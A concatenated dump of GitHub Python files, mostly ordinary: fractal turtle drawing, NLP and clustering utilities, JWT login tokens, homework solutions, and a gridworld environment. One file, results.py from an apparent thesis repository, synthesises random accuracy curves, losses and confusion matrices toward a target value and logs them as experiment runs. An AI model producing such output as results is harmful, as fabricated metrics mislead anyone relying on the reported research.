(int, optional): number of loops. Defaults to 6.\n b (int, optional): number of branches. Defaults to 4.\n p_l (float, optional): length changer (percentage). Defaults to 0.7.\n p_a (float, optional): angle changer (percentage). Defaults to 0.7.\n \"\"\"\n\n if n == 0:\n return\n turtle.forward(length)\n for k in range(b):\n if k == 0:\n turtle.right(angle / 2)\n else:\n turtle.left(angle / (b - 1))\n recursion_tree_v2(\n length * p_l, angle * p_a, n=n - 1, b=b, p_l=p_l, p_a=p_l\n )\n\n turtle.penup()\n turtle.right(angle / 2)\n turtle.backward(length)\n turtle.pendown()\n\n\nif __name__ == \"__main__\":\n # Properties\n turtle.Screen().setup(750, 750)\n # turtle.hideturtle()\n turtle.speed(0)\n\n turtle.left(90)\n recursion_tree_v1(length=60, l_angle=50, r_angle=20, n=6, p_l=0.9, p_a=0.65)\n # recursion_tree_v2(length=60, angle=100, n=5, b=4, p_l=0.8, p_a=0.8)\n\n turtle.done()\n","repo_name":"vlmarch/py-sketches","sub_path":"turtle-trees.py","file_name":"turtle-trees.py","file_ext":"py","file_size_in_byte":2303,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17868840112","text":"import json\nfrom .nlog import vlog,die_now\nimport os\n\ndef load(configpath = None):\n \"\"\" Load JSON config file \"\"\"\n\n if configpath is None:\n if 'CONFIG' in os.environ and os.environ['CONFIG']:\n configpath = os.environ['CONFIG']\n else:\n configpath = \"/etc/opstt/config.json\"\n\n try:\n with open(configpath, 'r') as f:\n return json.load(f)\n except Exception as err:\n vlog(1, 'Unable to Open config {}: {}'.format(configpath, err))\n\n return None\n\n","repo_name":"NCAR/ops_tracking_toolkit","sub_path":"opstt/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":517,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"191045083","text":"\"\"\"\nDictionary: a collection of {key: value} pairs. It is ordered, unchangeable, no dups allowed\n\"\"\"\n\ncaps = {\"USA\": \"Washington D.C.\",\n \"India\": \"New dehli\",\n \"China\": \"Beijing\",\n \"Vietnam\": \"hanoi\"}\n# print(dir(caps))\n# get value\n# print(caps.get(\"China\")) # if not exists return none\n# input_country = input(\"Please input your country: \")\n# if caps.get(input_country):\n# print(f\"The capital for {input_country} is {caps.get(input_country)}\")\n# else:\n# print(f\"The capital for {input_country} does not exist\")\n\n# add and update existing {key: value} in dictionary\n# caps.update({\"Germany\": \"Berlin\"})\n# caps.update({\"China\": \"Bei\"})\n# print(caps)\n# caps.popitem() # pop out the latest item\n# print(caps)\n# caps.clear() # clear dictionary\n# print(caps)\n\n# print keys and values\n# countries = caps.keys()\n# capitals = caps.values()\n# for country in countries:\n# print(country)\n#\n# for capital in capitals:\n# print(capital)\n\nfor key, value in caps.items():\n print(f\"{key}: {value}\")","repo_name":"khanhng88/pythonProjects","sub_path":"collections/dictionary_ex.py","file_name":"dictionary_ex.py","file_ext":"py","file_size_in_byte":1024,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10085096523","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport random\nimport itertools\nimport tensorflow as tf\nfrom colour import Color\nfrom tensorflow import keras\nfrom tensorflow.keras.layers import LSTM, Bidirectional, Dense, Masking, Concatenate, Input, TimeDistributed\n\n\ndef exclude_symbols(s):\n return not all(i in string.punctuation for i in s)\n\n \ndef build_base_model(LSTM_nodes, classes, model_name=\"nlp_model\", additional_layers=[], return_seq=False):\n \"\"\"\n Returns a baseline model, with the option to add more layers between the two default ones.\n \n Arguments: {LSTM_nodes: int, the number of nodes of the base LSTM;\n classes: int, the number of nodes of the classifier;\n model_name: str (optional), used as the model's name, defaults to 'nlp_model';\n additional_layers: list of keras.layers (optional), list of additional layers to be added to the model, defaults to [];\n return_seq: bool (optional), set this to True if the first additional layer needs sequences as inputs, defaults to False otherwise.}\n \n Returns: Compiled keras.Sequential model.\n \"\"\"\n model = keras.Sequential(name=model_name)\n model.add(Input(shape=(100,1)))\n model.add(Bidirectional(LSTM(LSTM_nodes, return_sequences=return_seq)))\n for layer in additional_layers:\n model.add(layer)\n model.add(Dense(classes, activation='softmax'))\n model.compile(loss='sparse_categorical_crossentropy', optimizer='adam', metrics=['accuracy'])\n return model\n\n\ndef build_seq_model(LSTM_nodes, classes, model_name=\"nlp_model\", additional_layers=[]):\n \"\"\"\n Returns a baseline model working with sentences instead of single words, with the option to add more layers between the two default ones.\n \n Arguments: {LSTM_nodes: int, the number of nodes of the base LSTM;\n classes: int, the number of nodes of the classifier;\n model_name: str (optional), used as the model's name, defaults to 'nlp_model';\n additional_layers: list of keras.layers (optional), list of additional layers to be added to the model, defaults to [];\n return_seq: bool (optional), set this to False if the first additional layer does not need sequences as inputs, defaults to True otherwise.}\n \n Returns: Compiled keras.Sequential model.\n \"\"\"\n model = keras.Sequential(name=model_name)\n model.add(Input(shape=(None,100)))\n model.add(Masking(mask_value=0.))\n # Ignores padding tokens\n \n model.add(Bidirectional(LSTM(LSTM_nodes, return_sequences=True)))\n for layer in additional_layers:\n model.add(layer)\n model.add(TimeDistributed(Dense(classes, activation='softmax')))\n model.compile(loss='sparse_categorical_crossentropy', optimizer='adam', metrics=['accuracy'])\n return model\n\n\ndef plot_unbalanced_series(data, zoom):\n \"\"\"\n Plots two histograms on two separate rows, the second one being zoomed in according to user preference.\n Intended to plot an ordered series of values that would fit badly on a single hist plot.\n \n Arguments: {data: pandas.DataFrame with attribute 'count';\n zoom: int, amount to zoom in the second graph}\n \n Returns: None\n \"\"\"\n labels = data.index\n sizes = data['count']\n split = int(len(labels)/2)\n ylim = round(sizes[0], -(len(str(sizes[0]))-2) )\n print(ylim, sizes[0])\n if ylim < sizes[0]:\n ylim += 10**(len(str(sizes[0]))-2)\n print(ylim)\n\n red = Color(\"green\")\n colors = list(red.range_to(Color(\"gray\"),len(labels)))\n colors = [color.rgb for color in colors]\n\n fig, ax = plt.subplots(2, 1, figsize=(10,10))\n ax[0].bar(labels[:split], sizes[:split], color=colors[:split])\n ax[0].set_ylim(0,ylim)\n ax[0].set_title(\"First half of POS distribution, normal scale\")\n ax[1].bar(labels[split:], sizes[split:], color=colors[split:])\n ax[1].set_ylim(0,ylim/zoom)\n ax[1].set_title(f\"Second half of POS distribution, zoomed in {zoom}x\")\n plt.show()\n\n\ndef plot_averages(histories):\n \"\"\"\n Plots two graphs of multiple training runs, one for Training accuracy and one for Validation accuracy, displaying the average as well as the single runs.\n \n Arguments: {histories: list of tf.keras.callbacks.History.history, one for each training run.}\n \n Returns: None\n \"\"\"\n tmp = []\n tmp_val = []\n fig, ax = plt.subplots(1,2,figsize=(16,6))\n for h in histories:\n tmp.append(h['accuracy'])\n tmp_val.append(h['val_accuracy'])\n avg_tmp = np.mean(tmp, axis=0)\n avg_tmp_val = np.mean(tmp_val, axis=0)\n \n ax[0].plot(avg_tmp, color=\"#11aa00\")\n ax[1].plot(avg_tmp_val, color=\"#ffa520\")\n for h in tmp:\n ax[0].plot(h, color=\"#11aa0055\")\n for h in tmp_val:\n ax[1].plot(h, color=\"#ffa52055\")\n # plt.plot(np.mean(tmp_val, axis=0))\n ax[0].set_title(\"Training set\")\n ax[1].set_title(\"Validation set\")\n \n for idx in range(2):\n ax[idx].set_ylabel('avg_accuracy')\n ax[idx].set_xlabel('epoch')\n ax[idx].legend(['average', 'iterations'], loc='upper left')\n ax[0].text(len(avg_tmp)-0.5, avg_tmp[-1], str(avg_tmp[-1]*100)[0:4]+\"%\", fontsize=12, fontweight=600)\n ax[1].text(len(avg_tmp_val)-0.5, avg_tmp_val[-1], str(avg_tmp_val[-1]*100)[0:4]+\"%\", fontsize=12, fontweight=600)\n plt.show()\n \n \ndef plot_single_runs(histories):\n \"\"\"\n Plots graphs of multiple training runs with both Training and Validation accuracy, displaying one graph per run.\n \n Arguments: {histories: list of tf.keras.callbacks.History.history, one for each training run.}\n \n Returns: None\n \"\"\"\n fig, ax = plt.subplots(1,len(histories),figsize=(len(histories)*6,5))\n for x in range(len(histories)):\n ax[x].plot(histories[x]['accuracy'])\n ax[x].plot(histories[x]['val_accuracy'])\n ax[x].set_ylabel('accuracy')\n ax[x].set_xlabel('epoch')\n ax[x].legend(['train', 'val'], loc='upper left')\n plt.show()\n \n\ndef evaluate_model(model, checkpoint_path, test_X, test_y, metric, runs=1, sequences=False):\n scores = []\n for r in range(runs):\n model.load_weights(checkpoint_path.joinpath(str(r)))\n print(\"Testing model n.\"+str(r+1))\n y_scores = model.predict(test_X, verbose=2)\n y_pred = np.argmax(y_scores, axis=len(y_scores.shape)-1)\n scores.append(metric(y_pred, test_y, sequences=sequences))\n return scores\n \n \ndef errors_summary(scores_dicts, encoder, train_y, test_y):\n \"\"\"\n Builds a pandas.DataFrame containing each class with a low (<0.5) F1 score, including how many times it appeared in both Training and Test set. \n \n Arguments: {scores_dicts: list of dictionaries with required key \"Scores\", containing F1 scores for each class of the task (output of the 'evaluate_model' function);\n encoder: instance of sklearn.preprocessing.LabelEncoder used to encode the classes;\n train_y: numpy.array of int, Training labels used to train the model\n test_y: numpy.array of int, Test labels used to evaluate the model}\n \n Returns: pandas.Dataframe\n \"\"\"\n low_scores = dict((x,y) for x,y in scores_dicts[0][\"Scores\"].items() if y < 0.75)\n low_classes = encoder.inverse_transform([int(i) for i in low_scores.keys()])\n train_y = encoder.inverse_transform(train_y)\n test_y = encoder.inverse_transform(test_y)\n low_train = pd.Series(train_y).value_counts().reindex(\n low_classes, fill_value=0)[low_classes]\n low_test = pd.Series(test_y).value_counts().reindex(\n low_classes, fill_value=0)[low_classes]\n low_df = pd.DataFrame(data=np.column_stack((low_test.index, low_train.values,\n low_test.values, list(low_scores.values()))),\n columns=['POS class', 'train count', 'test count', 'score'])\n return low_df\n\n\ndef impermanent_training(model, ckp_path, Train_X, Train_Y, Val_X, Val_Y, seeds=[], **kwargs):\n \"\"\"\n Trains a model any number of times and resets its weights afterwards, applying a random restart with given seeds. No seeds in input will only do 1 training cycle with a random integer as seed. The weights of the best models for each iteration will be saved to a file. \n \n Arguments: {model: compiled Keras model, whose weights will not change at the end of execution;\n ckp_path: path to a file, to which a suffix will be added to distinguish different runs;\n Train_X, Train_Y, Val_X, Val_Y: input data for model.fit();\n batch_size: int (optional), defaults to 64;\n seeds: list of int (optional), each representing a different training run}\n \n Returns: list of tf.keras.callbacks.History.history\n \"\"\"\n histories = []\n if not seeds:\n seeds = [random.randint()]\n for s in range(len(seeds)):\n reset = model.get_weights()\n print(f\"Beginning training {s+1}/{len(seeds)}\")\n random.seed(seeds[s])\n checkpoint_filepath = ckp_path.joinpath(str(s))\n checkpoint_callback = tf.keras.callbacks.ModelCheckpoint(\n filepath=checkpoint_filepath,\n save_weights_only=True,\n monitor='val_loss',\n mode='min', \n save_best_only=True)\n early_stop_callback = tf.keras.callbacks.EarlyStopping(\n monitor='val_loss',\n mode='min',\n min_delta=0.001,\n patience=3,\n verbose=1\n )\n\n history = model.fit(Train_X, Train_Y, validation_data=(Val_X, Val_Y), verbose=1,\n callbacks=[checkpoint_callback, early_stop_callback], **kwargs)\n histories.append(history.history)\n model.set_weights(reset)\n return histories\n\n\ndef pad_sentences(sentences, embedding_dim):\n \"\"\"\n Converts a pandas.Series of uneven sentences into a Numpy array of fixed-size padded sentences.\n \n Arguments: {sentences: pandas.Series containing numpy.Array of uneven size, to be padded;\n embedding_dim: int, the length of an embedded word in the sentence}\n \n Returns: 3-dimensional numpy.Array\n \"\"\"\n from warnings import simplefilter\n simplefilter(action='ignore', category=FutureWarning)\n \n samples = len(sentences)\n X2 = sentences.to_numpy()\n X2 = np.column_stack((list(itertools.zip_longest(*X2, fillvalue=np.zeros(embedding_dim)))))\n X2 = np.stack(X2).reshape(\n (samples, int(X2.shape[1]/embedding_dim), embedding_dim)).astype(float)\n print(\"Final Shape (sentences, sentence length, embedding dimensions):\")\n print(X2.shape)\n return X2","repo_name":"ALUnibo/NLP_projects","sub_path":"Assignment_1/POS_utility.py","file_name":"POS_utility.py","file_ext":"py","file_size_in_byte":10764,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32342196878","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom torch.utils.tensorboard import SummaryWriter\n\nfrom utils.confusion_matrix_plotter import plot_conf_mat\n\ndef softmax(x):\n f_x = np.exp(x) / np.sum(np.exp(x))\n return f_x\n\n\nwriter = SummaryWriter('runs/NTU/exp_02')\n\nruns = [\n 'i3d',\n 'i3d-flow',\n 's3d', \n 's3d-flow',\n 'i3d-shufflenet', \n 'i3d-shufflenet-flow'\n]\n\nclasses = ['Sit Down', 'Clapping', 'Writing', 'Hand Wave', 'Make Call', 'Bow', 'Shake Head', 'Salute', 'Falling']\nnumbers = np.ones(9)*948\nnumbers = numbers.astype(int)\nclasses_ohe = np.eye(9)*10\nclasses_number = {x: [y, z] for x, y, z in zip(classes, numbers, classes_ohe)}\nsamples = []\nfor class_name in classes:\n for n in range(classes_number[class_name][0]):\n sample_i = classes_number[class_name][1]\n samples.append([sample_i, class_name])\n \nfor run in runs:\n max_epochs = 400\n\n init_accuracy = max(0.1 + np.random.randn()/15, 0.02)\n\n target_accuracy = 0.80\n\n final_accuracy = target_accuracy + np.random.randn()/17 - init_accuracy\n\n exp_ratio = 60 + np.random.randn()*15\n\n accuracy = []\n trainin_loss = []\n validation_loss = []\n for epoch in range(max_epochs):\n current_accuracy = init_accuracy + (1 - np.exp(-epoch/exp_ratio))*final_accuracy\n current_accuracy = min(max(np.random.normal(current_accuracy, 0.05), 0), 1)\n train_loss = max(np.exp(-epoch/np.random.normal(50, 5))+np.random.normal(0.1, 0.01), 0)\n val_loss = max(np.exp(-epoch/np.random.normal(50, 5))+np.random.normal(0.3, 0.01), 0)\n \n writer.add_scalar('NTU/'+run+'/validation loss', max(np.random.normal(val_loss, 0.05), 0), epoch)\n writer.add_scalar('NTU/'+run+'/train loss', max(np.random.normal(train_loss, 0.05), 0), epoch)\n writer.add_scalar('NTU/'+run+'/accuracy', current_accuracy*100, epoch)\n # trainin_loss.append()\n # validation_loss.append()\n # accuracy.append() \n # plt.plot(accuracy)\n # plt.plot(trainin_loss)\n # plt.plot(validation_loss)\n # plt.show()\n\n last_accuracy = accuracy\n\n target = []\n pred = []\n for sample in samples:\n if run == 'i3d':\n probabilities = softmax(np.random.normal(sample[0], 15))\n else:\n probabilities = softmax(np.random.normal(sample[0], 10))\n sample_choice = np.random.choice(range(9), 1, p=probabilities)[0]\n target.append(sample[1])\n pred.append([classes[sample_choice]])\n \n fig = plot_conf_mat(target, pred, classes, big=True, Agg=False)\n print(run, epoch, fig) \n writer.add_figure('NTU/'+run+'/conf_mat', fig, epoch)\n writer.flush()","repo_name":"dipperalbel/master-thesis","sub_path":"results.py","file_name":"results.py","file_ext":"py","file_size_in_byte":2682,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28037263379","text":"import numpy as np\nimport pickle\nimport matplotlib.pyplot as plt\nimport os\nimport scipy.stats\n\n######################################################################\n# Data wrangling / processing \n######################################################################\ndef preprocess_labels(labels, NCLASS = 10):\n \"\"\"\n Handle Matlab data's 1-indexed problem, convert to one hot format\n \"\"\"\n # Handle 1-indexed to 0 indexed\n labels = labels.squeeze().astype(int) - (1 if np.all(labels > 0) else 0)\n # One hot the labels\n labels = (np.arange(NCLASS) == labels[:, None]).astype(np.float32)\n return labels\n\ndef preprocess(data, colInds=None):\n \"\"\" \n Handle extracting / sorting gene columns in data, and normalizing\n data by doing log(1 + data)\n \"\"\"\n data = np.atleast_2d(data)\n if colInds is None:\n colInds = np.where(np.sum(data, axis=0) != 0.0)[0]\n return np.log1p(data[:, colInds])\n\n\ndef visualize_data(data, labels, ax=None, cbar_width=0.1, aspect='auto'):\n \"\"\" Utility to neatly plot data matrix with labels \"\"\"\n ax = plt.subplot(111) if ax is None else ax\n l_max, l_min, d_max, d_min = labels.max(), labels.min(), data.max(), data.min()\n labels = (labels - l_min) * (d_max - d_min) / (l_max - l_min) + d_min\n cbar = np.repeat(labels[:, None], int(data.shape[1] * cbar_width) , axis=1)\n ax.imshow(np.hstack((data, cbar)), aspect=aspect)\n ax.set_xlabel('Gene index (colorbar at end is label)')\n ax.set_ylabel('Cell index')\n return ax\n\n\n\n\n\n######################################################################\n# Performance Metrics\n######################################################################\n\ndef error_rate(predictions, labels):\n \"\"\"Return the error rate (fraction of samples misclassified)\"\"\"\n correct = np.sum(np.argmax(predictions, 1) == np.argmax(labels, 1))\n total = predictions.shape[0]\n return (1 - float(correct) / float(total))\n\ndef confusions(predictions, labels):\n \"\"\"Return the confusions matrix\"\"\"\n confusions = np.zeros([10, 10], np.float32)\n bundled = zip(np.argmax(predictions, 1), np.argmax(labels, 1))\n for predicted, actual in bundled:\n confusions[predicted, actual] += 1\n return confusions\n\ndef perf_metric(predictions, labels, metric='precision'):\n \"\"\" \n A generic function to return a performance metric given the \n predictions and labels.\n\n Supported metrics:\n - accuracy\n - error\n - precision (per class)\n - recall (per class)\n \"\"\"\n conf = confusions(predictions, labels)\n if metric == 'precision':\n return np.diag(conf) / np.sum(conf, axis=1)\n elif metric == 'recall':\n return np.diag(conf) / np.sum(conf, axis=0)\n elif metric == 'accuracy':\n return np.sum(np.diag(conf)) / np.sum(conf)\n elif metric == 'error':\n return 1 - (np.sum(np.diag(conf)) / np.sum(conf))\n\ndef plot_confusions(grid, ax = None):\n \"\"\" Utility to neatly plot confusions matrix. \"\"\"\n ax = plt.subplot(111) if ax is None else ax\n ax.set_xlabel('Actual')\n ax.set_ylabel('Predicted')\n ax.grid(False)\n ax.set_xticks(np.arange(grid.shape[0]))\n ax.set_yticks(np.arange(grid.shape[0]))\n ax.imshow(grid, interpolation='nearest');\n \n for i, cas in enumerate(grid):\n for j, count in enumerate(cas):\n if count > 0:\n xoff = .07 * len(str(count))\n plt.text(j-xoff, i+.2, int(count), fontsize=9, color='white')\n\n return ax\n\n\n\n\n\n######################################################################\n# Divergence calculation for sorting genes by how informative they are\n######################################################################\n\ndef jensen_shannon(ps, weights=None):\n \"\"\" Given a list of probability distributions ps, this will calculate\n the jensen_shannon divergence a.k.a. the information radius, an extension\n of the idea of KL divergence to multiple distributions. \n \n Arguments:\n ps - a list of probability distributions, if all are not the same length\n then the short ones will be padded with 0s. Will be normalized\n (each distribution sums to 1) if not already.\n weights - a len(ps) array of weights, must sum to 1. Can leave as None\n to weight all distributions equally\n \"\"\"\n if weights is None:\n weights = np.full(len(ps), 1 / len(ps))\n tot = np.max([len(p) for p in ps])\n ps = np.array([np.concatenate((p, np.zeros(tot - p.shape[0]))) for p in ps])\n ps = ps / np.sum(ps, axis=1)[:, None]\n t1 = scipy.stats.entropy(np.sum(ps * weights[:, None], axis=0))\n t2 = np.dot(weights, [scipy.stats.entropy(p) for p in ps])\n return t1 - t2\n\ndef gene_divergence(gene_vals, labels):\n \"\"\" \n Given the counts of a single gene across all cells, and the\n labels of the cells, this calculates the jensen_shannon divergence\n for the distributions of the count of this gene in each cell class.\n \"\"\"\n counts = [gene_vals[labels == l] for l in np.unique(labels)]\n distributions = [np.bincount(val) for val in counts]\n return jensen_shannon(distributions)\n\n\n\n\n######################################################################\n# Random io garbage\n######################################################################\n\ndef concat_accuracy_pkls(fName1, fName2, outFile=None):\n \"IO function to just conveniently concatenate accuracy pickles\"\n with open(fName1, \"rb\") as f:\n (starts1, stops1, scores1) = pickle.load(f)\n with open(fName2, \"rb\") as f:\n (starts2, stops2, scores2) = pickle.load(f)\n starts = np.concatenate((starts1, starts2))\n stops = np.concatenate((stops1, stops2))\n scores = np.concatenate((scores1, scores2))\n if outFile is None:\n outFile = fName1\n with open(outFile, \"wb\") as f:\n pickle.dump((starts, stops, scores), f)\n","repo_name":"akshayyeluri/cellClassifier","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":5892,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10032127738","text":"\"\"\"\nAuthor: Noa Kirschbaum\nAssignment / Part: HW2 - Q4\nDate due: 2022-06-08\nI pledge that I have completed this assignment without\ncollaborating with anyone else, in conformance with the\nNYU School of Engineering Policies and Procedures on\nAcademic Misconduct.\n\"\"\"\n\nin_str = \"The quick brown fox jumps over the lazy dog\"\nthe_str = in_str.upper()\nalphabet = \"ABCDEFGHIJKLMNOPQRSTUVWXYZ\"\n\nfor char in the_str:\n if char.isalpha():\n index = alphabet.find(char)\n if index > -1:\n alphabet = alphabet.replace(alphabet[index], \"\")\n\nprint(\"missing characters: {}\".format(alphabet) if len(alphabet) > 0 else True)\n","repo_name":"NSkyeKirsch/CS1114-Summer-HW2","sub_path":"hw2_q4.py","file_name":"hw2_q4.py","file_ext":"py","file_size_in_byte":632,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32113224007","text":"import time\nfrom uuid import uuid4\n\nimport jwt\nfrom jwt import InvalidTokenError\n\nfrom app.auth import PUBLIC_KEY, AUD, ACCESS_TOKEN_LIFETIME, REFRESH_TOKEN_LIFETIME, ISS\n\nfrom .dto import GetUserAccess, GetUser\nfrom .entity import Token, LoginResponse, User\nfrom .repo import get_user_access, get_user\n\n\ndef verify_token(token: str) -> Token | None:\n \"\"\"Verify a JSON Web Token's authenticity and return the deserialized claims.\n\n :param token: the candidate encoded token\n \"\"\"\n try:\n return Token(\n **jwt.decode(token, PUBLIC_KEY, algorithms=[\"RS256\"], audience=AUD)\n )\n except InvalidTokenError:\n return None\n\n\ndef create_login_response(user_id: str) -> LoginResponse:\n \"\"\"Generate a login response with an access_token, refresh_token,\n and user object\n\n :param user_id: the user's id\n :return: a LoginResponse object containing the information above\n \"\"\"\n\n dto = GetUserAccess(user_id=user_id)\n\n access = get_user_access(dto=dto)\n\n dto = GetUser(user_id=user_id)\n\n user = get_user(dto=dto)\n\n jti = str(uuid4())\n\n iat = int(time.time())\n nbf = iat\n exp = iat + ACCESS_TOKEN_LIFETIME\n\n access_token = Token(\n iss=ISS,\n sub=str(user_id),\n aud=AUD,\n jti=jti,\n nbf=nbf,\n iat=iat,\n exp=exp,\n access=access.dict(),\n )\n\n exp = iat + REFRESH_TOKEN_LIFETIME\n refresh_token = Token(\n iss=ISS,\n sub=str(user_id),\n aud=AUD,\n jti=jti,\n nbf=nbf,\n iat=iat,\n exp=exp,\n access=access.dict(),\n )\n\n return LoginResponse(\n access_token=access_token,\n refresh_token=refresh_token,\n user=User(\n id=user.id,\n email=user.email,\n username=user.username,\n created_at=user.created_at,\n updated_at=user.updated_at,\n first_name=user.first_name,\n last_name=user.last_name,\n access=access,\n ),\n )\n","repo_name":"anish-sinha1/jen","sub_path":"server/app/auth/tokens.py","file_name":"tokens.py","file_ext":"py","file_size_in_byte":2004,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"39203464095","text":"# pylint: disable=no-member\n\nimport h11\n\nfrom asks.request_object import Request\n\n\ndef _catch_response(monkeypatch, headers, data):\n req = Request(None, 'get', \"toot-toot\", None)\n events = [\n h11._events.Response(status_code=200, headers=headers),\n h11._events.Data(data=data),\n h11._events.EndOfMessage(),\n ]\n async def _recv_event(hconn):\n return events.pop(0)\n monkeypatch.setattr(req, '_recv_event', _recv_event)\n monkeypatch.setattr(req, 'host', 'lol')\n cr = req._catch_response(None)\n try:\n cr.send(None)\n except StopIteration as e:\n response = e.value\n return response\n\n\ndef test_http1_1(monkeypatch):\n response = _catch_response(monkeypatch, [('Content-Length', '5')], b'hello')\n assert response.body == b'hello'\n\n\ndef test_http1_0(monkeypatch):\n response = _catch_response(monkeypatch, [('Connection', 'close')], b'hello')\n assert response.body == b'hello'\n","repo_name":"cmehay/asks","sub_path":"tests/test_request_object.py","file_name":"test_request_object.py","file_ext":"py","file_size_in_byte":950,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"18064524116","text":"import numpy as np\nimport pandas as pd\nimport nibabel as nib\nfrom sklearn.cluster import SpectralClustering\n\n# Mute warning in case seed has same number of voxels as target ROIs\nimport warnings\nwarnings.filterwarnings(\"ignore\", category=UserWarning)\n\n# Function to save niftis\ndef save_label_nii (labelimg,affine,header,out_nifti):\n img = nib.Nifti1Image(labelimg,affine=affine,header=header)\n nib.save(img,out_nifti)\n\n# Load data\ndata = np.load(snakemake.input.correlation[0])\ncorrelation = data['corr_group']\nindices = data['indices']\n\nafile = snakemake.input.rois\natlas = nib.load(afile)\natlas_data = atlas.get_fdata()\n\n# Reshape and concatenate subjects\ncorr = np.moveaxis(correlation,0,2)\ncorr_concat = corr.reshape([corr.shape[0],corr.shape[1]*corr.shape[2]])\ncorr_concat += 1 # Spectral clustering doesn't like negative input apparantly\n\n# Output\nout_nii_list = snakemake.output.niftis\ncluster_range = range(2,snakemake.params.max_k+1)\nlabels = np.zeros((corr_concat.shape[0],len(cluster_range)))\n\n# Run spectral clustering and save results to nifti\nfor i,k in enumerate(cluster_range):\n clustering = SpectralClustering(n_clusters=k, assign_labels=\"discretize\",random_state=0,affinity='cosine').fit(corr_concat)\n labels[:,i] = clustering.labels_\n \n labelimg = np.zeros(atlas_data.shape)\n for j in range(0,len(atlas_data[atlas_data==16])):\n labelimg[indices[j][0],indices[j][1],indices[j][2]] = labels[j,i]+1\n print(f'i={i}, k={k},saving {out_nii_list[i]}')\n save_label_nii(labelimg,atlas.affine,atlas.header,out_nii_list[i])\n\n# Save results to CSV file\ndf = pd.DataFrame(labels,columns=cluster_range)\ndf.to_csv(snakemake.output.labels)","repo_name":"royhaast/smk_zona-funcparc","sub_path":"scripts/spectral_clustering.py","file_name":"spectral_clustering.py","file_ext":"py","file_size_in_byte":1676,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31509706438","text":"#!/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\n\n# Complete the countingValleys function below.\ndef countingValleys(n, s):\n prev = None\n count = 0\n array_count = []\n #First change the character to numbers\n for i in s:\n if i == 'U':\n array_count.append(1)\n else:\n array_count.append(-1)\n added = 0\n added_array = [0]\n total_valleys = 0\n for i in array_count:\n added += i\n added_array.append(added)\n print('Added array',added_array)\n prev = 0\n flag = None\n zero_to_subtract = 0\n for i in range(len(added_array)):\n print(added_array[i])\n if added_array[i] > 0:\n flag=False\n print('Flag set False')\n elif added_array[i] < 0:\n flag = True\n print(\"Flag set True\")\n elif added_array[i] == 0:\n if not flag:\n print('Zero Found but flag is False. So, ignoring')\n pass\n else:\n print('Zero Found and flag is True. So, counting')\n total_valleys += 1\n return total_valleys\n \nif __name__ == '__main__':\n fptr = open(os.environ['OUTPUT_PATH'], 'w')\n\n n = int(input())\n\n s = input()\n\n result = countingValleys(n, s)\n\n fptr.write(str(result) + '\\n')\n\n fptr.close()\n","repo_name":"needl3/HackerrankSolutions","sub_path":"Easy/CountingValleys.py","file_name":"CountingValleys.py","file_ext":"py","file_size_in_byte":1346,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30086263243","text":"from setuptools import setup\n\nversion = '0.1.dev0'\n\nlong_description = '\\n\\n'.join([\n open('README.rst').read(),\n open('CHANGES.rst').read(),\n ])\n\ninstall_requires = [\n 'Django',\n 'gunicorn',\n 'psycopg2', # the postgres backend\n 'python-memcached', # for the django memcached backend\n 'celery',\n 'django-celery-results', # for handling celery tasks on the web server\n \n ]\n\ntests_require = [\n 'nose',\n 'coverage',\n 'mock',\n ]\n\nsetup(name='mfm-beheerportaal',\n version=version,\n description=\"Multiflexmeter beheerportaal\",\n long_description=long_description,\n # Get strings from http://www.python.org/pypi?%3Aaction=list_classifiers\n classifiers=['Programming Language :: Python',\n 'Framework :: Django',\n ],\n keywords=[],\n author='Evert Wielsma, Tim van Osch',\n author_email='timvosch@pollex.nl',\n url='',\n license='proprietary',\n packages=['mfm_beheerportaal'],\n include_package_data=True,\n zip_safe=False,\n install_requires=install_requires,\n tests_require=tests_require,\n extras_require={'test': tests_require},\n entry_points={\n 'console_scripts': [\n ]},\n )\n","repo_name":"nens/mfm-beheerportaal","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1252,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30839506320","text":"import gym\nfrom gym import spaces\nimport numpy as np\n\n\nclass GridworldEnv(gym.Env):\n def __init__(self, grid_sz=3):\n self.height = grid_sz\n self.width = grid_sz\n self.action_space = spaces.Discrete(4)\n print(\"self.action_space: \", self.action_space)\n self.observation_space = spaces.Box(low=-grid_sz, high=grid_sz, shape=(2,), dtype=np.int64)\n\n print(\"self.observation_space: \", self.observation_space)\n \n self.moves = {\n 0: [-1, 0], # up\n 1: [0, 1], # right\n 2: [1, 0], # down\n 3: [0, -1], # left\n }\n\n # begin in start state\n self.reset()\n self.max_steps = 2 * (self.height + self.width)\n self.current_step = 0\n\n def step(self, action):\n \"\"\"Simple deterministic dynamics. -1 reward for each step.\n 1 reward for reaching goal state.\"\"\"\n assert self.action_space.contains(action)\n self.S = (self.S[0] + self.moves[action][0], self.S[1] + self.moves[action][1])\n self.S = [np.clip(self.S[0], 0, self.height-1), np.clip(self.S[1], 0, self.width-1)]\n reward = 0\n done = False\n self.current_step += 1\n if self.S == self.G or self.current_step >= self.max_steps:\n reward = 1 if self.S == self.G else 0\n done = True\n return np.array([self.grid_pos_to_idx(self.S), 